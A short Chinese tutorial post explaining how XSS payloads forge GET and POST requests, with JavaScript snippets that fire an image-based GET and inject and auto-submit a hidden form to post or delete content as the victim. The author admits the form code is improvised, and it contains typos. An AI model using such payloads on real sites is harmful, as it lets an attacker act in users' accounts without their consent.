0x01关于构造get和post请求

对于web来说,只要你有get或者post请求即可完成对其的所有操作,这个http协议里说的,对于公鸡方来说,利用javascript即可让浏览器发出请求

var img = document.createElement("img"); img.src = "https://xxxxxxxx"document.body.appendChild(img);

学过javascript的同学都知道,这是个通过图片发起的get请求

假使在一个sns上,你要删除一个说说或者个性签名之类的,即在url后跟参数(如delete&id=xxx之类的)

从而执行这段js代码(xss payload)即可达到添加或删除的功能。

下面再写一个post的


var dd = document.createElement("p"); document.body.appendChild(dd); ddinnerHTML = '<form action="" method="post" id="xss***" name="mbform">'+ '<input type="hidden" value="***" name="***" />'+ '<input type="text" value="test" name="mb_text" />'+ '</form>' document.getElementById("xss***").submit();

呃。。。这是我yy乱写的一个表单提交的post请求,大概执行后的结果是提交添加一个文章啊或者签名之类发布一条消息。

所以,xss并不是只能劫持cookies会话,在无法登录后台(如设置http only时)可在前台直接操作,达到你想要的目的,对消息的添加删除只是其中一种,其他的还可以读取用户数据啊,获取目标本机真实ip之类的。

先暂时写这里,会尽快整理写文章科普接下来的内容